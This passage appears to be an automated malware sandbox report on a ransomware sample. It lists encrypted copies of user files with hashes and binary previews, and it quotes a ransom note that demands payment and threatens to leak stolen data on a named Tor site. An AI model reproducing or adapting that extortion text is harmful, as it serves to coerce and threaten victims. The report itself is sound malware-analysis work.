Preview:	m3.+........\|tWO...:.^U...#...t..8.g......^..B..,E..#}.....i\f. ....9.... .h.y0..m.....m@.....sp.9Xk..........f.....Q......z .{.X.P...[.J7....!..Zv.9.r)(...[.U..~.....j...l{V..V.8%A...H.>.^x.!..........nR..8A.g.@.8.#J.:.!c.=Ci5...3...q..ba.).Q&vV?...........t.....2@O.....<.E..lI..p..FD...lH.D...t!..m...D..R.HXa.P..7.Y..a...e....).d..w-O....i.U.......{.j.....U..W.Xk....#.i.,..p=......y.M".\|D...2..>..+\|0...y..!(.c)..?M.4..E.Q.....1hmv....v..a..Xj.^f..O......w..z.H..I...q......!i...n..o.>.Y...=.......Di..Sy7... ....T.Y..#`....j...b..C...l....c.~'...5\|..Y.~-u>'..n.{...!.=(.$";Yt.?.G..q..%..,[.ny...#....2...&.\|..1$.0.k...Z/.{(..N.iK :..'..>C...a.xq.k.+.&O7.....#4.$..X..E....8:\h-.....K.X.....&....N5O...O......#\Eb..D.W..L.A)j.K}S.A!.8.\.M!.j..Q..GD.!w...X{.......O.1...V.I...e....T.P..Ab..3.Z..4g..o..../."1c.5..j"...?4..t$.t.......a.{.-w....t1...-.... .?<.Zt.g.BEH}0...g%.....V.]..2Td.t..O.....)o.}.JN.B.q.*.....&.=c9[...29....Oa...T/G.y.&j.....;.a.4.

C:\Users\user\Downloads\SUAVTZKNFL.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980149982104934
Encrypted:	false
SSDEEP:	192:4w3ec2WsaWbsvxv5D8Tv8CRzM8lHzref51ajMBiBV+n:4meLWsaWbavIT1ZrezvB9
MD5:	265577148DB170ECCF291E2B77A82991
SHA1:	C1806DC3A3FBF3E49393098324FCBB11496F959A
SHA-256:	B7ADDB669A237B1091FDA5C940C6DC19BA320FC4C626E24EC27B35D6F275850A
SHA-512:	42F01CEA3E0BB5FBF2BEAA43C6649BA11F27697C19F8F0285A404BFFABDC7E11091D0CAC4BE5CED65F93B7AD2F0C1A744904145E30FBC1FB15D35C2D7C5DFE16
Malicious:	false
Preview:	m3.+........\|tWO...:.^U...#...t..8.g......^..B..,E..#}.....i\f. ....9.... .h.y0..m.....m@.....sp.9Xk..........f.....Q......z .{.X.P...[.J7....!..Zv.9.r)(...[.U..~.....j...l{V..V.8%A...H.>.^x.!..........nR..8A.g.@.8.#J.:.!c.=Ci5...3...q..ba.).Q&vV?...........t.....2@O.....<.E..lI..p..FD...lH.D...t!..m...D..R.HXa.P..7.Y..a...e....).d..w-O....i.U.......{.j.....U..W.Xk....#.i.,..p=......y.M".\|D...2..>..+\|0...y..!(.c)..?M.4..E.Q.....1hmv....v..a..Xj.^f..O......w..z.H..I...q......!i...n..o.>.Y...=.......Di..Sy7... ....T.Y..#`....j...b..C...l....c.~'...5\|..Y.~-u>'..n.{...!.=(.$";Yt.?.G..q..%..,[.ny...#....2...&.\|..1$.0.k...Z/.{(..N.iK :..'..>C...a.xq.k.+.&O7.....#4.$..X..E....8:\h-.....K.X.....&....N5O...O......#\Eb..D.W..L.A)j.K}S.A!.8.\.M!.j..Q..GD.!w...X{.......O.1...V.I...e....T.P..Ab..3.Z..4g..o..../."1c.5..j"...?4..t$.t.......a.{.-w....t1...-.... .?<.Zt.g.BEH}0...g%.....V.]..2Td.t..O.....)o.}.JN.B.q.*.....&.=c9[...29....Oa...T/G.y.&j.....;.a.4.

C:\Users\user\Downloads\SUAVTZKNFL.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978461229780969
Encrypted:	false
SSDEEP:	192:pEWl9pWyHn/OvewbGCoYsBwLK7AhosjJBkV2XFjVr/c838V+n:pEW8en/O2wSCK6nhosNuV2XxR/X3d
MD5:	BD639E1847BE0E3C66EDDF8E4FD81554
SHA1:	4CFCC1B222162A580863187DBF56F3C27BE6B3F9
SHA-256:	49D34A499CFB1DBB40D76BAC335470FCAAE2225468376CE8E85CF057AF8A88C2
SHA-512:	50ECA5D965DCFF40A343E22634D15166975248E6318C25942E59B28D9A918AB1DE119AE0E7939897A902B5D1110E8BC8F10735AC4C7EA3576FC6CF26A5439D5B
Malicious:	false
Preview:	..=d.....p.m.D...1........y51..R.I..G...[.^6..,......%5.....[l..+..VR........g...q.q...F3.\.......{..+`V0....w....i._.).).lw..t....r...8y....L.h.....Qq.a.......[.H!..\.....~2..rM."=.xu..!m.Q......%.A......)../..%. .;...3...:.2.R.....mp#E#I..#1Y.\|KL.8K.?.....dF......\|<......k<.S... t.rN...E..(l%..v...Ih.....[?..6'n....-....z5H#...K.\X.G.....r.0N..4..B.....kc...E/..C./.8.B.v(..U.....%.5m..g....i..0.&.g...0.G...ddP\.o.B.i..m..mG......>c...<...l3g.'....LH+..CQ.4...........LZ.&..q`.VB\|~....g.Ta..W.^>..B].r+P..G.EU....>L.S.f%w...E..K...%8G.-.+}....V...s..f...j....~..\|........FG}-4....z.K!..v:..=.Y...x$...=L.\|$}.d..G.....q7.....rc..'a%.z.bw......4.........RmQ.Cb..hFQ.M...Bpr../.rc....c......f...A..N.T..P....8..T....5..$.r.0m.}...?Z....a.w...e..na...G.E..R.qb.qI.z0.....;.6.....)A..e..{@...+[...._.G#4..:C.....Rm....hn3.Y`.a.......a.q'........=D&..6rAk..Y....i...M6... ..#d....<.u'..[.2..h.....Z..8..nAMS.\.<-v.J...S../G.L@.J..........

C:\Users\user\Downloads\SUAVTZKNFL.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978461229780969
Encrypted:	false
SSDEEP:	192:pEWl9pWyHn/OvewbGCoYsBwLK7AhosjJBkV2XFjVr/c838V+n:pEW8en/O2wSCK6nhosNuV2XxR/X3d
MD5:	BD639E1847BE0E3C66EDDF8E4FD81554
SHA1:	4CFCC1B222162A580863187DBF56F3C27BE6B3F9
SHA-256:	49D34A499CFB1DBB40D76BAC335470FCAAE2225468376CE8E85CF057AF8A88C2
SHA-512:	50ECA5D965DCFF40A343E22634D15166975248E6318C25942E59B28D9A918AB1DE119AE0E7939897A902B5D1110E8BC8F10735AC4C7EA3576FC6CF26A5439D5B
Malicious:	false
Preview:	..=d.....p.m.D...1........y51..R.I..G...[.^6..,......%5.....[l..+..VR........g...q.q...F3.\.......{..+`V0....w....i._.).).lw..t....r...8y....L.h.....Qq.a.......[.H!..\.....~2..rM."=.xu..!m.Q......%.A......)../..%. .;...3...:.2.R.....mp#E#I..#1Y.\|KL.8K.?.....dF......\|<......k<.S... t.rN...E..(l%..v...Ih.....[?..6'n....-....z5H#...K.\X.G.....r.0N..4..B.....kc...E/..C./.8.B.v(..U.....%.5m..g....i..0.&.g...0.G...ddP\.o.B.i..m..mG......>c...<...l3g.'....LH+..CQ.4...........LZ.&..q`.VB\|~....g.Ta..W.^>..B].r+P..G.EU....>L.S.f%w...E..K...%8G.-.+}....V...s..f...j....~..\|........FG}-4....z.K!..v:..=.Y...x$...=L.\|$}.d..G.....q7.....rc..'a%.z.bw......4.........RmQ.Cb..hFQ.M...Bpr../.rc....c......f...A..N.T..P....8..T....5..$.r.0m.}...?Z....a.w...e..na...G.E..R.qb.qI.z0.....;.6.....)A..e..{@...+[...._.G#4..:C.....Rm....hn3.Y`.a.......a.q'........=D&..6rAk..Y....i...M6... ..#d....<.u'..[.2..h.....Z..8..nAMS.\.<-v.J...S../G.L@.J..........

C:\Users\user\Downloads\ZGGKNSUKOP.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980127905413415
Encrypted:	false
SSDEEP:	192:N7Eb7zUb1L/6q4YcbbzK0rB4JPUGxQg6q0xV3wTV+n:dEb74hL/6q4LrK0tkPFxx6qoek
MD5:	8247BE52C9E7380FB228591A9E0B2B77
SHA1:	0566F6BEEEA265102CDBD3CE36483BEEF481AD5F
SHA-256:	880CAB40B0D3A4CA1DF3C6FD04617652FD35FD6E57816375B8CB02DFBA72240C
SHA-512:	2CC091B4BD363DCD76D259F7B27FCB279D2EBC252CC2FD1357A8C55208B5A627EEAFD291AE6F5122F7990D809EDB94CB90DC66851A4114CB49B02A643C313C25
Malicious:	false
Preview:	....MV..?..4.....Opv^..]3QQ........R.z..T...^'$.9$..F>c.7.!A.g...be_.X.;.$Vh.."dY.m..... ...F!&...S...6..(%...x.../;..F.D~..g.{)K...:...K..2K..>x.k..P...x..I..V.....+...+..~I..5......P...sR..b...&.....E.\|@M....../U<Cg....3.T.%.x]....R....bG..~.C?s.OG.....&..........d...er.<GA.r3.. -q.O09...QN.e.g.S..G.s.^....i..Ac..Z].y.C....Mp.8.A.qf?..F'.l...(;f...%8.Q....~yS..1i..\`..........d....M.....O...J..54Qg..80.m.I.m.A...0....$g-._.8q..9v.q.J...`.....z..Y ..x....%.C;?)...,,.......OCx.g.=M=f.7.F.v..........B.6.J{wm.WJ..U..b..X...C..n...i.Y.lm..@...G.!p....S0..23U.z1.?.7.r\|.)W..,.`[....+....Z`.$..%<U...&.-.I...q.....!...c.X......!)D>.%.V).q?&.Q.n7_.w-..'.".9._-...%,6KD$..F[..Y..(g..K...V.<..I.Bu:..X9......(.Teb...R...@^....wQ@K ....a....r..rg8~}.w.\|....V..>....c....../.}....)Hi...T6..1....@.......Ip..^..O-.t.7..i.2...............<.NGv.4.a'B...2.D.j.o......i>.\Q.....j.G..M....Z..C.N...&9.G..I;.z..v.u}.v\.T...C..Bh../r.q".C.X$.6.=....h.....=..O....

C:\Users\user\Downloads\ZGGKNSUKOP.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980127905413415
Encrypted:	false
SSDEEP:	192:N7Eb7zUb1L/6q4YcbbzK0rB4JPUGxQg6q0xV3wTV+n:dEb74hL/6q4LrK0tkPFxx6qoek
MD5:	8247BE52C9E7380FB228591A9E0B2B77
SHA1:	0566F6BEEEA265102CDBD3CE36483BEEF481AD5F
SHA-256:	880CAB40B0D3A4CA1DF3C6FD04617652FD35FD6E57816375B8CB02DFBA72240C
SHA-512:	2CC091B4BD363DCD76D259F7B27FCB279D2EBC252CC2FD1357A8C55208B5A627EEAFD291AE6F5122F7990D809EDB94CB90DC66851A4114CB49B02A643C313C25
Malicious:	false
Preview:	....MV..?..4.....Opv^..]3QQ........R.z..T...^'$.9$..F>c.7.!A.g...be_.X.;.$Vh.."dY.m..... ...F!&...S...6..(%...x.../;..F.D~..g.{)K...:...K..2K..>x.k..P...x..I..V.....+...+..~I..5......P...sR..b...&.....E.\|@M....../U<Cg....3.T.%.x]....R....bG..~.C?s.OG.....&..........d...er.<GA.r3.. -q.O09...QN.e.g.S..G.s.^....i..Ac..Z].y.C....Mp.8.A.qf?..F'.l...(;f...%8.Q....~yS..1i..\`..........d....M.....O...J..54Qg..80.m.I.m.A...0....$g-._.8q..9v.q.J...`.....z..Y ..x....%.C;?)...,,.......OCx.g.=M=f.7.F.v..........B.6.J{wm.WJ..U..b..X...C..n...i.Y.lm..@...G.!p....S0..23U.z1.?.7.r\|.)W..,.`[....+....Z`.$..%<U...&.-.I...q.....!...c.X......!)D>.%.V).q?&.Q.n7_.w-..'.".9._-...%,6KD$..F[..Y..(g..K...V.<..I.Bu:..X9......(.Teb...R...@^....wQ@K ....a....r..rg8~}.w.\|....V..>....c....../.}....)Hi...T6..1....@.......Ip..^..O-.t.7..i.2...............<.NGv.4.a'B...2.D.j.o......i>.\Q.....j.G..M....Z..C.N...&9.G..I;.z..v.u}.v\.T...C..Bh../r.q".C.X$.6.=....h.....=..O....

C:\Users\user\Downloads\ZQIXMVQGAH.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980373726806871
Encrypted:	false
SSDEEP:	192:A606GeJt5Q5fLv4A1Rz8vHqB8Utr1Exzs6L4jBnObvJB8KkydHYNtuV+n:86GYq98or1ERsavT9m
MD5:	1A87C32EE742B459C984DB3672507BCE
SHA1:	4A1F48DA56A1AA28CF0511B29ACBC6F5A81C8B8F
SHA-256:	A460AEF7AC82E53B0BA31809E659D1302D757783CEA70CBC25C56AF734973684
SHA-512:	D7670194977D86FB7C15377DACB3231825803247A858D99C4B19D85D2300665240FC3CB5235BBEBC62376957BF64DAAC7D1D1308C23574DCDD4C1BAB052C865C
Malicious:	false
Preview:	8..k..?...[pE./.9...<iz:).#.\|..I.I...r../...........e...x......;.'..1\.Z.H..BjT.t......p..!:RK.........d.....B.....-...."..q.q:..v..i......U.5...h.@]TD.....<........c....;v........2....r..X/....~rX...T..u2#e.2v...`.R.>.E..)...../^.dr.....".9.KA.A'...~.A..-NW.....e..d..~...<......`.a0...J..#..=.......H.g.!..H._.8$.#..I...]..5.i..Ku~..Z.c..hd.o`..\G...R.>.......tP.Os.......v"w..B+.T.....,SQ..V......e.6....y...Q.a.s;.5...._..9?....1.5...2=V..2.!.._..(.'s......z0m."Gv.....dJ...d.d..HMp9N,=...#.y.,]..HbHX.z..\.o..9{6-...?._.........yL..;......;..\|........b.v...M.V...H..-`.nJ.=2....3.[.G@..'.....g.Ed..E...~.......m...>..f..Sd...M....S............U....Q.z.-.G.T..=o..c;...wg.p).....$V.=.v ~.=o...<J.....W6...........5.)g....g.i.. ...>..c.j.....Z.... .......V....\|...\|.a.b.^..u.k\g..Xe..v .(......m>_..!...p.@....I.PQ;.1N7h.....7..c..(..g7(.-..C...FH...A0..E~W..Fc...C..].`..5.W~...U..)...^.d..i...n-....m...,{P........."P^.u._n.).z

C:\Users\user\Downloads\ZQIXMVQGAH.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980373726806871
Encrypted:	false
SSDEEP:	192:A606GeJt5Q5fLv4A1Rz8vHqB8Utr1Exzs6L4jBnObvJB8KkydHYNtuV+n:86GYq98or1ERsavT9m
MD5:	1A87C32EE742B459C984DB3672507BCE
SHA1:	4A1F48DA56A1AA28CF0511B29ACBC6F5A81C8B8F
SHA-256:	A460AEF7AC82E53B0BA31809E659D1302D757783CEA70CBC25C56AF734973684
SHA-512:	D7670194977D86FB7C15377DACB3231825803247A858D99C4B19D85D2300665240FC3CB5235BBEBC62376957BF64DAAC7D1D1308C23574DCDD4C1BAB052C865C
Malicious:	false
Preview:	8..k..?...[pE./.9...<iz:).#.\|..I.I...r../...........e...x......;.'..1\.Z.H..BjT.t......p..!:RK.........d.....B.....-...."..q.q:..v..i......U.5...h.@]TD.....<........c....;v........2....r..X/....~rX...T..u2#e.2v...`.R.>.E..)...../^.dr.....".9.KA.A'...~.A..-NW.....e..d..~...<......`.a0...J..#..=.......H.g.!..H._.8$.#..I...]..5.i..Ku~..Z.c..hd.o`..\G...R.>.......tP.Os.......v"w..B+.T.....,SQ..V......e.6....y...Q.a.s;.5...._..9?....1.5...2=V..2.!.._..(.'s......z0m."Gv.....dJ...d.d..HMp9N,=...#.y.,]..HbHX.z..\.o..9{6-...?._.........yL..;......;..\|........b.v...M.V...H..-`.nJ.=2....3.[.G@..'.....g.Ed..E...~.......m...>..f..Sd...M....S............U....Q.z.-.G.T..=o..c;...wg.p).....$V.=.v ~.=o...<J.....W6...........5.)g....g.i.. ...>..c.j.....Z.... .......V....\|...\|.a.b.^..u.k\g..Xe..v .(......m>_..!...p.@....I.PQ;.1N7h.....7..c..(..g7(.-..C...FH...A0..E~W..Fc...C..].`..5.W~...U..)...^.d..i...n-....m...,{P........."P^.u._n.).z

C:\Users\user\Downloads\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3764
Entropy (8bit):	5.732028010843027
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH696:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USm
MD5:	2EA3FE8EC31254F6188FC9828C11979E
SHA1:	D4B7C5B1CBC9B425786E96CF0266288AD8BE4145
SHA-256:	67472CEEDB0862BEBE28A632AE0DD382C8DD4A8E754907DB6A74260393C413CD
SHA-512:	3D2B2C6881677A1FBFA828CA99572F4EDB73218BD4721216C58224CE4B6450631E262D8E087A2B17DB915D05915EA39D73D402E20B3875080DE46BFE7A2D54D5
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Favorites\Amazon.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976985476358939
Encrypted:	false
SSDEEP:	192:qg+8bzupi5OATOUbO3B5YsFmqq9gjyDhNtS65axAHhw1GJ+p4V+0:qsmt/tjqiju5Sjg+pm
MD5:	9D031A46C81367EA13DB0133F910B2ED
SHA1:	FBDEAE72D6FB31BA14C822FBDC9A95B004CDB3B3
SHA-256:	64AD87B7D8BA1E8163FF6D48C80867666992F9F29715C772A393C4767F1DA377
SHA-512:	8969F569DCE7ACBB8909A8F48910DEE95D63A8451D591A9A0C9FE24AD049C1B5046E38E055B2E79EDE848BE94CFB1D77A183750786D1A6D3F68B4F35596B3AB1
Malicious:	false
Preview:	.O..3.."U3....\|............{H~$:8"-.M.<...c.4.DN......z..3.......y..Frq)..%......sP.....`D..>.Z4...y..[t_B....&.t.&.z...9B..........],....g.#../ON.Y.o...2..s.....Y..'O0...g.!J..p........x+R...H..R=z....x..e.>.;.>.m!.k....z....%]y...p....G+D{....zMvYGB.-......6.....ZW...T cm..eY. .../...n#9.][g.1...r...2.).t...R..+e....vQg.!b.Z...4.z....I.....4o!'o..`X..\|...M..."...W...Q..Q..)..E...T.P.v..#xO..OMc.1m}Y.q.'...K.:....V.t.M..~....^..az.$.r...G..,..#..cd4.3."{;.0Y..r..c...#.J......Q...1...P..o.....T.B..KTh...4.j2....~\|=c...o+.S2..#8.$...t...{...48..F.......3.r7.V.W.r..?...e.a.....Ia"..........Z...U......c...7.....1\..w...........;9...NK.:H....[kF.....s...C_."j.....".1M.:.<m..#.....8..'.'.9.S.yW#t.#Hs.z5p....:F.h..\}....\...o..x..x.......X#.....l........(X._o@...UTg%6..qJ...U..2..e..4.~........\..yS1._,.l..'h..h.K.....cW..q\V.@.A\)....u.5. ...y.....i..y....r'..m_2yU.......$.F.....8....?.....q...kZ.k..b.S....p.hF..c..8^!$Ol1...5\|.!o~

C:\Users\user\Favorites\Amazon.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976985476358939
Encrypted:	false
SSDEEP:	192:qg+8bzupi5OATOUbO3B5YsFmqq9gjyDhNtS65axAHhw1GJ+p4V+0:qsmt/tjqiju5Sjg+pm
MD5:	9D031A46C81367EA13DB0133F910B2ED
SHA1:	FBDEAE72D6FB31BA14C822FBDC9A95B004CDB3B3
SHA-256:	64AD87B7D8BA1E8163FF6D48C80867666992F9F29715C772A393C4767F1DA377
SHA-512:	8969F569DCE7ACBB8909A8F48910DEE95D63A8451D591A9A0C9FE24AD049C1B5046E38E055B2E79EDE848BE94CFB1D77A183750786D1A6D3F68B4F35596B3AB1
Malicious:	false
Preview:	.O..3.."U3....\|............{H~$:8"-.M.<...c.4.DN......z..3.......y..Frq)..%......sP.....`D..>.Z4...y..[t_B....&.t.&.z...9B..........],....g.#../ON.Y.o...2..s.....Y..'O0...g.!J..p........x+R...H..R=z....x..e.>.;.>.m!.k....z....%]y...p....G+D{....zMvYGB.-......6.....ZW...T cm..eY. .../...n#9.][g.1...r...2.).t...R..+e....vQg.!b.Z...4.z....I.....4o!'o..`X..\|...M..."...W...Q..Q..)..E...T.P.v..#xO..OMc.1m}Y.q.'...K.:....V.t.M..~....^..az.$.r...G..,..#..cd4.3."{;.0Y..r..c...#.J......Q...1...P..o.....T.B..KTh...4.j2....~\|=c...o+.S2..#8.$...t...{...48..F.......3.r7.V.W.r..?...e.a.....Ia"..........Z...U......c...7.....1\..w...........;9...NK.:H....[kF.....s...C_."j.....".1M.:.<m..#.....8..'.'.9.S.yW#t.#Hs.z5p....:F.h..\}....\...o..x..x.......X#.....l........(X._o@...UTg%6..qJ...U..2..e..4.~........\..yS1._,.l..'h..h.K.....cW..q\V.@.A\)....u.5. ...y.....i..y....r'..m_2yU.......$.F.....8....?.....q...kZ.k..b.S....p.hF..c..8^!$Ol1...5\|.!o~

C:\Users\user\Favorites\Bing.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976623662474096
Encrypted:	false
SSDEEP:	192:UdgZ96E7OaR/lLVkXT2aBjASKaBaUi3Wa17Yiz/xxSAPoRPfVQV+h:U0hxR/x63xAkA35YKwRPfV3
MD5:	870723AD59751404D1B4F58C1E243511
SHA1:	6D638F7558066D3895F03D631C0DF0E42E47EFD1
SHA-256:	8DCFB610927D77F22A10C82936FDCF0F6723C97174E2385F08F6BDC9CE78F5A0
SHA-512:	F694A900B4FA35D78CE1FE7062C0C52B43267B7CE5A4E7484C24FDE4F6C60FC7A0E504B5693C0789E05F16EBBBB129BAED9F754881AE81ED7AA6EAF6B0D13719
Malicious:	false
Preview:	......8Lh- .Lu[.K......$..I.\|"."..9.....g.fG...g...._r..Q.~..V........4CL-V.hcv.kkT.. A?..F...'..5....?...p;..X.m.[C@.]5......<i..V....j.X.=;+.........+G.....>0.DY.7.Z..G.V....a.$.\|....b.1@..R....?3.>....$j3.e.!UG...$\|......A.;..qo#F.R..u......./..W..$.2....8....6'n........=C\|nRv2.k......o....H...R.A.H.4.1...._...\..h.v-.`....5...i......N.a.. :k1.Z.}$..4"...c.}..F...>.z..}..L.UL......E.=..tVz..~...BL/.....7./...76Y........>.y.....Q...M......m..'......B'.~..X....z...RQ7.TG..,N..,..$....u..CB.7...N..u3.x.?<...D..8t.....G...l....X.......h.>B..:.....!......:)Q.......%@.Mk.J.@<....>...x.>.......m&:M...w..&"A....:....^k.......s........M?-...+$.;X...trJ...-u.......w2>..;;w.P..%.0.....0m.r...T.......1.]..K.9...gH`Y.d.....D..*.h.p..5..nm.%....Ap6j<..$.O.Yc.]..<'(...Y\|.x-..0[/.ae..(&.D. ..Z.... O.]$...OL.!.0..H..Ym..dV3#..u.......-.[..y."... ...Y....y..:.DNEY/4........".Pt...R...M.D..C.....&...`........Kc....5.k.^.......1F.....p..z....5..v.P...q

C:\Users\user\Favorites\Bing.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976623662474096
Encrypted:	false
SSDEEP:	192:UdgZ96E7OaR/lLVkXT2aBjASKaBaUi3Wa17Yiz/xxSAPoRPfVQV+h:U0hxR/x63xAkA35YKwRPfV3
MD5:	870723AD59751404D1B4F58C1E243511
SHA1:	6D638F7558066D3895F03D631C0DF0E42E47EFD1
SHA-256:	8DCFB610927D77F22A10C82936FDCF0F6723C97174E2385F08F6BDC9CE78F5A0
SHA-512:	F694A900B4FA35D78CE1FE7062C0C52B43267B7CE5A4E7484C24FDE4F6C60FC7A0E504B5693C0789E05F16EBBBB129BAED9F754881AE81ED7AA6EAF6B0D13719
Malicious:	false
Preview:	......8Lh- .Lu[.K......$..I.\|"."..9.....g.fG...g...._r..Q.~..V........4CL-V.hcv.kkT.. A?..F...'..5....?...p;..X.m.[C@.]5......<i..V....j.X.=;+.........+G.....>0.DY.7.Z..G.V....a.$.\|....b.1@..R....?3.>....$j3.e.!UG...$\|......A.;..qo#F.R..u......./..W..$.2....8....6'n........=C\|nRv2.k......o....H...R.A.H.4.1...._...\..h.v-.`....5...i......N.a.. :k1.Z.}$..4"...c.}..F...>.z..}..L.UL......E.=..tVz..~...BL/.....7./...76Y........>.y.....Q...M......m..'......B'.~..X....z...RQ7.TG..,N..,..$....u..CB.7...N..u3.x.?<...D..8t.....G...l....X.......h.>B..:.....!......:)Q.......%@.Mk.J.@<....>...x.>.......m&:M...w..&"A....:....^k.......s........M?-...+$.;X...trJ...-u.......w2>..;;w.P..%.0.....0m.r...T.......1.]..K.9...gH`Y.d.....D..*.h.p..5..nm.%....Ap6j<..$.O.Yc.]..<'(...Y\|.x-..0[/.ae..(&.D. ..Z.... O.]$...OL.!.0..H..Ym..dV3#..u.......-.[..y."... ...Y....y..:.DNEY/4........".Pt...R...M.D..C.....&...`........Kc....5.k.^.......1F.....p..z....5..v.P...q

C:\Users\user\Favorites\Facebook.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9787662806962505
Encrypted:	false
SSDEEP:	192:PfygqHlbV2vWFbqpb83mhFHw5WPUi1dv7X+Lvy9aMZaCoJpaPx4DiaV++:XyzHhoeFbEHw5WPhJ+zbMboJwZGi2
MD5:	AF0239BD4BE04BF8653406CB7FCFDBD9
SHA1:	EE97E00EA433CE4DB5611801A3F21C23CD67711C
SHA-256:	C1C5EC86EEA949650878DB504C8E805922D0B02661BFF6E464227206B2F5AE24
SHA-512:	4D183EEB133CB45B60A6DA6C83B3E67916C354777BB173D359E58BE46B66749E36570C6F48003F959987348B4D6AF3C15049C76AA5ED73AA27910BF9C4CEE39B
Malicious:	false
Preview:	XmY.V....,...G....\.i.`..)..z.=Q.].6..n/:.....K.;d........0...8.....?\|............~q?...=....Q{$c.{.:.2R..Om..E....../....G`..u8.X..m.X........P(.F..N..............kC.._I......"e..K..ge.].YR3s-.2).....jn........]..e..=B...........F:......RLU.?<...!.s\...6..{.9..3......ZV..O........JV....!....x,..T.].e.\.>).........:..S..>I.pCG.n......wBR'^......Jqx..>e...L.co.O....x....}}.0..SC...\lK....t....%]...yI..)<.p....7....S.....az.......>.c..1..".3_..(.<;}..o.:a..!..t....Tk..h.I._..-.3-.u.v9...s.Z.Z.._..a..<)OB0:u;S...`.q.0S .].8....5fR.u=..b........ ...@..f.......8X_../...T.!..R6y..fI#.9 ..K.a`.L.[s.i.....@....iM\.0..*.D2..._..qs`3L..F2:fE..!..pk@' ........S.g~=!......e".).qY.X.:..#K...G....E I.\. `...)....VV.0na\.....e..'.....9.P..u..C..]%...Z.T.....I.2.S.}...^J7V{$..@&w......[.$Y......?d..E.\|..N.5.....9..h.q.kK.....[."Qr.w........V.c.p2Ul..S'&k ....^..J(...N..ZvkD..O..q.=.=.B.......e.,..$ yR)=..~...^n.%.;...$U>.{u\|...i.5.....9..)

C:\Users\user\Favorites\Facebook.url.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9787662806962505
Encrypted:	false
SSDEEP:	192:PfygqHlbV2vWFbqpb83mhFHw5WPUi1dv7X+Lvy9aMZaCoJpaPx4DiaV++:XyzHhoeFbEHw5WPhJ+zbMboJwZGi2
MD5:	AF0239BD4BE04BF8653406CB7FCFDBD9
SHA1:	EE97E00EA433CE4DB5611801A3F21C23CD67711C
SHA-256:	C1C5EC86EEA949650878DB504C8E805922D0B02661BFF6E464227206B2F5AE24
SHA-512:	4D183EEB133CB45B60A6DA6C83B3E67916C354777BB173D359E58BE46B66749E36570C6F48003F959987348B4D6AF3C15049C76AA5ED73AA27910BF9C4CEE39B
Malicious:	false
Preview:	XmY.V....,...G....\.i.`..)..z.=Q.].6..n/:.....K.;d........0...8.....?\|............~q?...=....Q{$c.{.:.2R..Om..E....../....G`..u8.X..m.X........P(.F..N..............kC.._I......"e..K..ge.].YR3s-.2).....jn........]..e..=B...........F:......RLU.?<...!.s\...6..{.9..3......ZV..O........JV....!....x,..T.].e.\.>).........:..S..>I.pCG.n......wBR'^......Jqx..>e...L.co.O....x....}}.0..SC...\lK....t....%]...yI..)<.p....7....S.....az.......>.c..1..".3_..(.<;}..o.:a..!..t....Tk..h.I._..-.3-.u.v9...s.Z.Z.._..a..<)OB0:u;S...`.q.0S .].8....5fR.u=..b........ ...@..f.......8X_../...T.!..R6y..fI#.9 ..K.a`.L.[s.i.....@....iM\.0..*.D2..._..qs`3L..F2:fE..!..pk@' ........S.g~=!......e".).qY.X.:..#K...G....E I.\. `...)....VV.0na\.....e..'.....9.P..u..C..]%...Z.T.....I.2.S.}...^J7V{$..@&w......[.$Y......?d..E.\|..N.5.....9..h.q.kK.....[."Qr.w........V.c.p2Ul..S'&k ....^..J(...N..ZvkD..O..q.=.=.B.......e.,..$ yR)=..~...^n.%.;...$U>.{u\|...i.5.....9..)

C:\Users\user\Favorites\Google.url Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980620694862836
Encrypted:	false
